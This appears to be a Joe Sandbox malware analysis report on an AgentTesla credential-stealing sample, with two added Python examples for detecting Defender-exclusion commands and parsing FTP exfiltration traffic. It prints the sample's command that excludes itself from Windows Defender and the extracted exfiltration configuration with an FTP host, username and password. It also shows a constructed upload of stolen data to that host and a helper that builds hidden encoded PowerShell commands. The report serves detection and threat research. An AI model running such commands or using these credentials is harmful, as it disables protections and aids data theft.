
Windows Analysis Report
hesaphareket.exe

Overview

General Information

Sample name: hesaphareket.exe
Analysis ID: 1561748
MD5: f698edb1fcf31bb642bc2e18b3f05813
SHA1: b73dbfbedbe4bc7fad70def31c2bf94ec18ff992
SHA256: 5618efb4038198984ccca27de0dd5850a697038d9f0c2a9ad26b17bb26cc0f7b
Tags: exe, geo, TUR, user-abuse_ch

Detection

Family: AgentTesla
Score: 100 (range: 0 - 100)
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected AgentTesla
Yara detected AntiVM3
.NET source code contains potential unpacker
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
Contains functionality to log keystrokes (.Net Source)
Injects a PE file into a foreign processes
Installs a global keyboard hook
Loading BitLocker PowerShell Module
Machine Learning detection for sample
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Mail credentials (via file / registry access)
Yara detected Generic Downloader
Abnormal high CPU Usage
Allocates memory with a write watch (potentially for evading sandboxes)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a window with clipboard capturing capabilities
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Sigma detected: Powershell Defender Exclusion
Uses 32bit PE files
Uses FTP
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer
Yara signature match

Classification

  • System is w10x64
  • hesaphareket.exe (PID: 6188 cmdline: "C:\Users\user\Desktop\hesaphareket.exe" MD5: F698EDB1FCF31BB642BC2E18B3F05813)
    • powershell.exe (PID: 5272 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\hesaphareket.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 3308 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • WmiPrvSE.exe (PID: 7416 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)
    • hesaphareket.exe (PID: 3268 cmdline: "C:\Users\user\Desktop\hesaphareket.exe" MD5: F698EDB1FCF31BB642BC2E18B3F05813)
    • hesaphareket.exe (PID: 5360 cmdline: "C:\Users\user\Desktop\hesaphareket.exe" MD5: F698EDB1FCF31BB642BC2E18B3F05813)
    • hesaphareket.exe (PID: 7212 cmdline: "C:\Users\user\Desktop\hesaphareket.exe" MD5: F698EDB1FCF31BB642BC2E18B3F05813)
  • cleanup
Name: Agent Tesla, AgentTesla
Description: A .NET based information stealer readily available to actors due to leaked builders. The malware is able to log keystrokes, can access the host's clipboard and crawls the disk for credentials or other valuable information. It has the capability to send information back to its C&C via HTTP(S), SMTP, FTP, or towards a Telegram channel.
Attribution: SWEED
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.agent_tesla

Extracted malware configuration:
{"Exfil Mode": "FTP", "Host": "ftp://ftp.normagroup.com.tr", "Username": "admins@normagroup.com.tr", "Password": "ab+LNvim5PAo"}
Yara matches (Source | Rule | Description | Author)

PCAP:
dump.pcap | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security

Memory dumps (5 of 7 entries shown):
00000007.00000002.3772427480.0000000002CEE000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security
00000007.00000002.3771073304.0000000000402000.00000040.00000400.00020000.00000000.sdmp | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security
00000007.00000002.3771073304.0000000000402000.00000040.00000400.00020000.00000000.sdmp | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security
00000007.00000002.3772427480.0000000002CA1000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security
00000007.00000002.3772427480.0000000002CA1000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security

Unpacked PEs (5 of 17 entries shown):
0.2.hesaphareket.exe.37e9150.2.unpack | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security
0.2.hesaphareket.exe.37e9150.2.unpack | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security
0.2.hesaphareket.exe.37e9150.2.unpack | INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID | Detects executables referencing Windows vault credential objects. Observed in infostealers | ditekSHen
  • 0x3122b:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5
  • 0x3129d:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55
  • 0x31327:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F
  • 0x313b9:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28
  • 0x31423:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29
  • 0x31495:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC
  • 0x3152b:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B
  • 0x315bb:$s8: 3C886FF3-2669-4AA2-A8FB-3F6759A77548
0.2.hesaphareket.exe.37e9150.2.unpack | MALWARE_Win_AgentTeslaV2 | AgenetTesla Type 2 Keylogger payload | ditekSHen
  • 0x2e6ae:$s2: GetPrivateProfileString
  • 0x2dd58:$s3: get_OSFullName
  • 0x2f3ea:$s5: remove_Key
  • 0x2f58f:$s5: remove_Key
  • 0x30458:$s6: FtpWebRequest
  • 0x3120d:$s7: logins
  • 0x3177f:$s7: logins
  • 0x34490:$s7: logins
  • 0x34542:$s7: logins
  • 0x35e3e:$s7: logins
  • 0x350dc:$s9: 1.85 (Hash, version 2, native byte-order)
0.2.hesaphareket.exe.3823770.0.unpack | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security

System Summary

Sigma rule matches: three rules fired on the same process-creation event (two authored by Florian Roth (Nextron Systems), one by Roberto Rodriguez @Cyb3rWard0g (rule) with oscd.community (improvements)). Event data:
  Command / CommandLine / ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\hesaphareket.exe"
  CommandLine|base64offset|contains: ~2yzw
  Image / NewProcessName / OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  ParentCommandLine: "C:\Users\user\Desktop\hesaphareket.exe"
  ParentImage: C:\Users\user\Desktop\hesaphareket.exe
  ParentProcessId: 6188, ParentProcessName: hesaphareket.exe
  ProcessId: 5272, ProcessName: powershell.exe
Note the mismatch between the command line (System32) and the image that actually ran (SysWOW64): the sample is a 32-bit process, so WOW64 file system redirection maps System32 to SysWOW64 for the child it spawns. Detection logic that keys on the System32 image path alone misses this event; match on the command line or on the process name instead.
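The two Sigma signatures above key on the Add-MpPreference command line, both in the clear and base64-encoded (PowerShell's -EncodedCommand takes UTF-16LE text, base64-encoded, and a string can appear in three different base64 spellings depending on its byte alignment). The following Python is an added example, not part of the Joe Sandbox report: it reimplements that detection over process-creation command lines. The plain command line is the one recorded above; the encoded variants are constructed here with encoded_command(). base64_offsets() is my own implementation of the idea behind Sigma's base64offset modifier, and ENCODED_SWITCH_RE is an assumption about how the -EncodedCommand switch and its abbreviations appear on a command line.

```python
import base64
import re

# Process-creation command line recorded in the sandbox report. The encoded
# samples used in __main__ are constructed with encoded_command() and are not
# from the report.
PLAIN = ('"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe" '
         'Add-MpPreference -ExclusionPath "C:\\Users\\user\\Desktop\\hesaphareket.exe"')

# Cmdlets and switches the Sigma rules key on. The plain match is
# case-insensitive; base64 is not, so both spellings are encoded separately.
CMDLETS = ("Add-MpPreference", "Set-MpPreference", "add-mppreference", "set-mppreference")
EXCLUSION_SWITCHES = ("-ExclusionPath", "-ExclusionProcess", "-ExclusionExtension", "-ExclusionIpAddress")

# PowerShell accepts any unambiguous prefix of -EncodedCommand (-e, -ec, -enc,
# -encodedcommand, ...). Assumption for this example: the payload is the next
# whitespace-separated token and is at least 16 base64 characters long.
ENCODED_SWITCH_RE = re.compile(r"-e(?:c|n[a-z]{0,13})?\s+([A-Za-z0-9+/=]{16,})", re.IGNORECASE)


def encoded_command(script: str) -> str:
    """Build a command line the way `powershell -EncodedCommand` expects it: UTF-16LE, then base64."""
    b64 = base64.b64encode(script.encode("utf-16le")).decode("ascii")
    return f"powershell.exe -NoP -W Hidden -EncodedCommand {b64}"


def base64_offsets(value: bytes) -> list:
    """Return the three base64 spellings of `value`, one per byte alignment (0, 1, 2).

    Base64 turns each 3-byte group into 4 characters, so the same bytes encode
    differently depending on where they start inside a group. Each variant keeps
    only the characters fully determined by `value`; characters that also depend
    on the unknown neighbouring bytes are dropped at both ends.
    """
    variants = []
    for align in range(3):
        padded = b"\x00" * align + value
        tail = (-len(padded)) % 3
        enc = base64.b64encode(padded + b"\x00" * tail).decode("ascii")
        start = (0, 2, 3)[align]      # characters influenced by the leading pad bytes
        end = (None, -2, -3)[tail]    # characters influenced by the trailing pad bytes
        variants.append(enc[start:end])
    return variants


def base64offset_contains(haystack: str, needle: str) -> bool:
    """True if any alignment of `needle` (as ASCII or UTF-16LE) occurs in `haystack`."""
    for raw in (needle.encode("ascii"), needle.encode("utf-16le")):
        if any(v in haystack for v in base64_offsets(raw)):
            return True
    return False


def decode_encoded_command(cmdline: str):
    """Decode the -EncodedCommand payload to text, or return None if absent or invalid."""
    m = ENCODED_SWITCH_RE.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16le")
    except (ValueError, UnicodeDecodeError):
        return None


def detect_defender_exclusion(cmdline: str) -> dict:
    """Flag a process-creation command line that tampers with Defender exclusions."""
    reasons = []
    lowered = cmdline.lower()
    if any(c.lower() in lowered for c in CMDLETS):
        reasons.append("plain MpPreference cmdlet")
        if any(s.lower() in lowered for s in EXCLUSION_SWITCHES):
            reasons.append("plain exclusion switch")
    if any(base64offset_contains(cmdline, c) for c in CMDLETS):
        reasons.append("base64-encoded MpPreference cmdlet")
    decoded = decode_encoded_command(cmdline)
    if decoded is not None:
        dl = decoded.lower()
        if any(c.lower() in dl for c in CMDLETS):
            reasons.append("decoded -EncodedCommand contains MpPreference cmdlet")
        if any(s.lower() in dl for s in EXCLUSION_SWITCHES):
            reasons.append("decoded -EncodedCommand adds a Defender exclusion")
    return {"suspicious": bool(reasons), "reasons": reasons, "decoded": decoded}


if __name__ == "__main__":
    # Prefixes of 0, 4, 6 and 8 UTF-16LE bytes put the cmdlet at every base64 alignment.
    samples = [PLAIN] + [
        encoded_command(p + "Add-MpPreference -ExclusionPath 'C:\\Users\\user\\Desktop\\hesaphareket.exe'")
        for p in ("", "x;", "xy;", "xyz;")
    ]
    for s in samples:
        print(detect_defender_exclusion(s)["reasons"])
```

Add-MpPreference only succeeds from an elevated process, but the attempt itself is the signal, so a match from a non-elevated parent is still worth an alert. Matching the encoded forms without decoding is what lets the rule run over raw command-line fields in a SIEM; the decode path is the confirmation step for an analyst.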
Suricata IDS alerts (Timestamp | SID | Severity | Classtype | Source IP:Port | Destination IP:Port | Protocol):
2024-11-24T08:22:44.191583+0100 | 2029927 | 1 | A Network Trojan was detected | 192.168.2.11:49712 | 104.247.165.99:21 | TCP
2024-11-24T08:22:45.338474+0100 | 2855542 | 1 | A Network Trojan was detected | 192.168.2.11:49724 | 104.247.165.99:57378 | TCP
2024-11-24T08:22:45.459003+0100 | 2855542 | 1 | A Network Trojan was detected | 192.168.2.11:49724 | 104.247.165.99:57378 | TCP


AV Detection

Source: 7.2.hesaphareket.exe.400000.0.unpack | Malware Configuration Extractor: Agenttesla {"Exfil Mode": "FTP", "Host": "ftp://ftp.normagroup.com.tr", "Username": "admins@normagroup.com.tr", "Password": "ab+LNvim5PAo"}
Source: ftp.normagroup.com.tr | Virustotal: Detection: 11%
Source: http://ftp.normagroup.com.tr | Virustotal: Detection: 11%
Source: hesaphareket.exe | ReversingLabs: Detection: 57%
Source: hesaphareket.exe | Virustotal: Detection: 58%
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 100.0% probability
Source: hesaphareket.exe | Joe Sandbox ML: detected
Source: hesaphareket.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: hesaphareket.exe | Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: C:\Users\user\Desktop\hesaphareket.exe | Code function 0_2_06D59739: 4x nop then jmp 06D5A068h
Source: C:\Users\user\Desktop\hesaphareket.exe | Code function 0_2_06D59788: 4x nop then jmp 06D5A068h

Networking

Source: Network traffic | Suricata IDS: 2855542 - Severity 1 - ETPRO MALWARE Agent Tesla CnC Exfil Activity : 192.168.2.11:49724 -> 104.247.165.99:57378
Source: Network traffic | Suricata IDS: 2029927 - Severity 1 - ET MALWARE AgentTesla Exfil via FTP : 192.168.2.11:49712 -> 104.247.165.99:21
Source: Yara match | File source: 0.2.hesaphareket.exe.3823770.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.hesaphareket.exe.37e9150.2.raw.unpack, type: UNPACKEDPE
Source: global traffic | TCP traffic: 192.168.2.11:49724 -> 104.247.165.99:57378
Source: Joe Sandbox View | IP Address: 104.247.165.99
Source: Joe Sandbox View | ASN Name: ASN-QUADRANET-GLOBALUS
Source: unknown | FTP traffic detected: 104.247.165.99:21 -> 192.168.2.11:49712, server greeting:
  220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------
  220-You are user number 1 of 50 allowed.
  220-Local time is now 10:22. Server port: 21.
  220-This is a private system - No anonymous login
  220-IPv6 connections are also welcome on this server.
  220 You will be disconnected after 15 minutes of inactivity.
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global traffic | DNS traffic detected: DNS query: ftp.normagroup.com.tr
Source: hesaphareket.exe, 00000007.00000002.3772427480.0000000002CEE000.00000004.00000800.00020000.00000000.sdmp, hesaphareket.exe, 00000007.00000002.3772427480.0000000002CFC000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://ftp.normagroup.com.tr
Source: hesaphareket.exe, 00000000.00000002.1331722297.000000000262A000.00000004.00000800.00020000.00000000.sdmp, hesaphareket.exe, 00000007.00000002.3772427480.0000000002CEE000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: hesaphareket.exe | String found in binary or memory: http://tempuri.org/ianiDataSet.xsd
Source: hesaphareket.exe | String found in binary or memory: http://tempuri.org/ianiDataSet1.xsd
Source: hesaphareket.exe | String found in binary or memory: http://tempuri.org/ianiDataSet2.xsdM
Source: hesaphareket.exe, 00000000.00000002.1333405214.00000000035D9000.00000004.00000800.00020000.00000000.sdmp, hesaphareket.exe, 00000007.00000002.3771073304.0000000000402000.00000040.00000400.00020000.00000000.sdmp | String found in binary or memory: https://account.dyn.com/
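The alerts above show an FTP control channel on port 21 (ET MALWARE AgentTesla Exfil via FTP) followed by traffic from a second client port to 104.247.165.99:57378, which is the shape of a passive-mode FTP data connection: the server names the data port in its 227 reply and the client opens a new connection to it. The following Python is an added example, not part of the Joe Sandbox report. It parses a constructed FTP control-channel transcript: the six 220 banner lines are the ones captured above, while the login, PASV and STOR exchange, the uploaded file name and the 227 reply are constructed for this example (the 227 reply is chosen so that 224*256 + 34 = 57378, to show how that port would arise). It then extracts the credentials, the passive data endpoint and the uploaded file name and checks them against the extracted malware configuration. Whether the real session used PASV, and what file name it uploaded, is not on this page.

```python
import re

# Constructed FTP control-channel transcript ("S:" server, "C:" client). Only the
# six 220 lines come from the report; everything after them is constructed.
SAMPLE_SESSION = """\
S: 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------
S: 220-You are user number 1 of 50 allowed.
S: 220-Local time is now 10:22. Server port: 21.
S: 220-This is a private system - No anonymous login
S: 220-IPv6 connections are also welcome on this server.
S: 220 You will be disconnected after 15 minutes of inactivity.
C: USER admins@normagroup.com.tr
S: 331 User admins@normagroup.com.tr OK. Password required
C: PASS ab+LNvim5PAo
S: 230 OK. Current directory is /
C: TYPE I
S: 200 TYPE is now 8-bit binary
C: PASV
S: 227 Entering Passive Mode (104,247,165,99,224,34)
C: STOR PW_user_2024_11_24_08_22_45.html
S: 150 Accepted data connection
S: 226-File successfully transferred
S: 226 0.012 seconds (measured here), 1.23 Mbytes per second
C: QUIT
S: 221 Goodbye.
"""

# Configuration extracted from the sample, as listed in the report.
EXTRACTED_CONFIG = {"Exfil Mode": "FTP", "Host": "ftp://ftp.normagroup.com.tr",
                    "Username": "admins@normagroup.com.tr", "Password": "ab+LNvim5PAo"}

PASV_RE = re.compile(r"\((\d{1,3}),(\d{1,3}),(\d{1,3}),(\d{1,3}),(\d{1,3}),(\d{1,3})\)")


def pasv_endpoint(reply: str):
    """Turn a 227 reply into (ip, port); the last two numbers are the port, high byte first."""
    m = PASV_RE.search(reply)
    if not m:
        return None
    a, b, c, d, p_hi, p_lo = (int(x) for x in m.groups())
    return f"{a}.{b}.{c}.{d}", p_hi * 256 + p_lo


def parse_ftp_session(transcript: str) -> dict:
    """Walk a control-channel transcript and collect banner, login, data channels and uploads."""
    s = {"banner": [], "user": None, "password": None, "logged_in": False,
         "tls": False, "data_endpoints": [], "uploads": []}
    pending_stor = None
    for line in transcript.splitlines():
        direction, _, text = line.partition(": ")
        if direction == "S":
            code = text[:3]
            if code == "220":
                s["banner"].append(text[4:])   # text after "220-" or "220 "
            elif code == "230":
                s["logged_in"] = True
            elif code == "227":
                ep = pasv_endpoint(text)
                if ep:
                    s["data_endpoints"].append(ep)
            elif code == "226" and pending_stor:
                # transfer completed on the most recently negotiated data channel
                ep = s["data_endpoints"][-1] if s["data_endpoints"] else None
                s["uploads"].append({"name": pending_stor, "endpoint": ep})
                pending_stor = None
        elif direction == "C":
            verb, _, arg = text.partition(" ")
            verb = verb.upper()
            if verb == "USER":
                s["user"] = arg
            elif verb == "PASS":
                s["password"] = arg
            elif verb == "AUTH" and arg.upper() == "TLS":
                s["tls"] = True
            elif verb == "STOR":
                pending_stor = arg
    return s


def exfil_findings(session: dict, config: dict) -> list:
    """Relate the observed session to the extracted configuration and describe the exfil."""
    findings = []
    if session["user"] == config.get("Username") and session["password"] == config.get("Password"):
        findings.append("login matches the credentials in the extracted configuration")
    if session["logged_in"] and not session["tls"]:
        findings.append("credentials were sent in cleartext (no AUTH TLS before USER/PASS)")
    for up in session["uploads"]:
        if up["endpoint"]:
            host, port = up["endpoint"]
            findings.append(f"STOR {up['name']} over passive data channel {host}:{port}")
    return findings


if __name__ == "__main__":
    for finding in exfil_findings(parse_ftp_session(SAMPLE_SESSION), EXTRACTED_CONFIG):
        print(finding)
```

The banner advertises [TLS], but a Suricata content rule can only match FTP commands it can read, so the port-21 alert itself implies the control channel was not upgraded with AUTH TLS; the parser records that as a finding. For blocking and hunting, the control-channel port is stable but the data port is negotiated per transfer, so the durable indicators are the host, the account and the 227 pattern, not 57378.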

Key, Mouse, Clipboard, Microphone and Screen Capturing

Source: 0.2.hesaphareket.exe.3823770.0.raw.unpack, oAKy.cs | .Net Code: _5754M2
Source: 0.2.hesaphareket.exe.37e9150.2.raw.unpack, oAKy.cs | .Net Code: _5754M2
Source: C:\Users\user\Desktop\hesaphareket.exe | Windows user hook set: 0 keyboard low level C:\Users\user\Desktop\hesaphareket.exe
Source: C:\Users\user\Desktop\hesaphareket.exe | Window created: window name: CLIPBRDWNDCLASS

System Summary

Source: 0.2.hesaphareket.exe.37e9150.2.unpack, type: UNPACKEDPE | Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers | Author: ditekSHen
Source: 0.2.hesaphareket.exe.37e9150.2.unpack, type: UNPACKEDPE | Matched rule: AgenetTesla Type 2 Keylogger payload | Author: ditekSHen
Source: 0.2.hesaphareket.exe.3823770.0.unpack, type: UNPACKEDPE | Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers | Author: ditekSHen
Source: 0.2.hesaphareket.exe.3823770.0.unpack, type: UNPACKEDPE | Matched rule: AgenetTesla Type 2 Keylogger payload | Author: ditekSHen
Source: 7.2.hesaphareket.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers | Author: ditekSHen
Source: 7.2.hesaphareket.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: AgenetTesla Type 2 Keylogger payload | Author: ditekSHen
Source: 0.2.hesaphareket.exe.3823770.0.raw.unpack, type: UNPACKEDPE | Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers | Author: ditekSHen
Source: 0.2.hesaphareket.exe.3823770.0.raw.unpack, type: UNPACKEDPE | Matched rule: AgenetTesla Type 2 Keylogger payload | Author: ditekSHen
Source: 0.2.hesaphareket.exe.37e9150.2.raw.unpack, type: UNPACKEDPE | Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers | Author: ditekSHen
Source: 0.2.hesaphareket.exe.37e9150.2.raw.unpack, type: UNPACKEDPE | Matched rule: AgenetTesla Type 2 Keylogger payload | Author: ditekSHen
Source: C:\Users\user\Desktop\hesaphareket.exe | Process Stats: CPU usage > 49%
Source: C:\Users\user\Desktop\hesaphareket.exe | Code functions: 0_2_00B5D51C, 0_2_06D5B2B8, 0_2_06D576F8, 0_2_06D55420, 0_2_06D59428, 0_2_06D50548, 0_2_06D54FE8, 0_2_06D51F18, 0_2_06D56B48, 0_2_06D55858, 0_2_06D55848
Source: C:\Users\user\Desktop\hesaphareket.exe | Code functions: 7_2_02BE4A60, 7_2_02BE3E48, 7_2_02BE9C78, 7_2_02BED200, 7_2_02BE4190, 7_2_062456B8, 7_2_06242EF8, 7_2_06243F28, 7_2_0624DC00, 7_2_06248D17, 7_2_062405B8, 7_2_06243630, 7_2_06244FD8, 7_2_0638DD40, 7_2_0638F0E8, 7_2_06381128, 7_2_06381123, 7_2_02BED1F3, 7_2_02BE9C73
Source: hesaphareket.exe, 00000000.00000002.1333405214.00000000035D9000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilenamef7121708-72dc-44f1-ae95-b037bc906047.exe4 vs hesaphareket.exe
Source: hesaphareket.exe, 00000000.00000002.1333405214.00000000035D9000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameMontero.dll8 vs hesaphareket.exe
Source: hesaphareket.exe, 00000000.00000002.1342710729.0000000007460000.00000004.08000000.00040000.00000000.sdmp | Binary or memory string: OriginalFilenameMontero.dll8 vs hesaphareket.exe
Source: hesaphareket.exe, 00000000.00000002.1331722297.0000000002637000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameArthur.dll" vs hesaphareket.exe
Source: hesaphareket.exe, 00000000.00000000.1306850427.0000000000300000.00000002.00000001.01000000.00000003.sdmp | Binary or memory string: OriginalFilenamempwF.exe4 vs hesaphareket.exe
Source: hesaphareket.exe, 00000000.00000002.1331722297.000000000262A000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilenamef7121708-72dc-44f1-ae95-b037bc906047.exe4 vs hesaphareket.exe
Source: hesaphareket.exe, 00000000.00000002.1338678115.0000000004E50000.00000004.08000000.00040000.00000000.sdmp | Binary or memory string: OriginalFilenameArthur.dll" vs hesaphareket.exe
Source: hesaphareket.exe, 00000000.00000002.1330120884.00000000007F8000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameclr.dllT vs hesaphareket.exe
Source: hesaphareket.exe, 00000007.00000002.3771220303.0000000000B99000.00000004.00000010.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameUNKNOWN_FILET vs hesaphareket.exe
Source: hesaphareket.exe, 00000007.00000002.3771073304.0000000000402000.00000040.00000400.00020000.00000000.sdmp | Binary or memory string: OriginalFilenamef7121708-72dc-44f1-ae95-b037bc906047.exe4 vs hesaphareket.exe
Source: hesaphareket.exe | Binary or memory string: OriginalFilenamempwF.exe4 vs hesaphareket.exe
Source: 0.2.hesaphareket.exe.37e9150.2.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID, author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 0.2.hesaphareket.exe.37e9150.2.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_AgentTeslaV2, author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
Source: 0.2.hesaphareket.exe.3823770.0.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID, author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 0.2.hesaphareket.exe.3823770.0.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_AgentTeslaV2, author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
Source: 7.2.hesaphareket.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID, author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 7.2.hesaphareket.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_AgentTeslaV2, author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
Source: 0.2.hesaphareket.exe.3823770.0.raw.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID, author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 0.2.hesaphareket.exe.3823770.0.raw.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_AgentTeslaV2, author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
Source: 0.2.hesaphareket.exe.37e9150.2.raw.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID, author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 0.2.hesaphareket.exe.37e9150.2.raw.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_AgentTeslaV2, author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
Source: hesaphareket.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: 0.2.hesaphareket.exe.3823770.0.raw.unpack, ekKu0.cs | Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.hesaphareket.exe.3823770.0.raw.unpack, vKf1z6NvS.cs | Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.hesaphareket.exe.3823770.0.raw.unpack, ZNAvlD7qmXc.cs | Cryptographic APIs: 'CreateDecryptor', 'TransformBlock'
Source: 0.2.hesaphareket.exe.3823770.0.raw.unpack, U2doU2.cs | Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.hesaphareket.exe.3823770.0.raw.unpack, BgffYko.cs | Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.hesaphareket.exe.3823770.0.raw.unpack, HrTdA63.cs | Cryptographic APIs: 'CreateDecryptor'
Source: 0.2.hesaphareket.exe.3823770.0.raw.unpack, Vvp22TrBv9g.cs | Cryptographic APIs: 'TransformFinalBlock' (4 occurrences)
Source: 0.2.hesaphareket.exe.7460000.4.raw.unpack, U5httJGmuF5DPKTAnl.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.hesaphareket.exe.3867b70.1.raw.unpack, U5httJGmuF5DPKTAnl.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.hesaphareket.exe.7460000.4.raw.unpack, Xdi37dj88nmLQeMQpH.cs | Security API names: _0020.SetAccessControl
Source: 0.2.hesaphareket.exe.7460000.4.raw.unpack, Xdi37dj88nmLQeMQpH.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.hesaphareket.exe.7460000.4.raw.unpack, Xdi37dj88nmLQeMQpH.cs | Security API names: _0020.AddAccessRule
Source: 0.2.hesaphareket.exe.3867b70.1.raw.unpack, Xdi37dj88nmLQeMQpH.cs | Security API names: _0020.SetAccessControl
Source: 0.2.hesaphareket.exe.3867b70.1.raw.unpack, Xdi37dj88nmLQeMQpH.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.hesaphareket.exe.3867b70.1.raw.unpack, Xdi37dj88nmLQeMQpH.cs | Security API names: _0020.AddAccessRule
Source: classification engine | Classification label: mal100.troj.spyw.evad.winEXE@11/6@1/1
Source: C:\Users\user\Desktop\hesaphareket.exe | File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\hesaphareket.exe.log
Source: C:\Users\user\Desktop\hesaphareket.exe | Mutant created: NULL
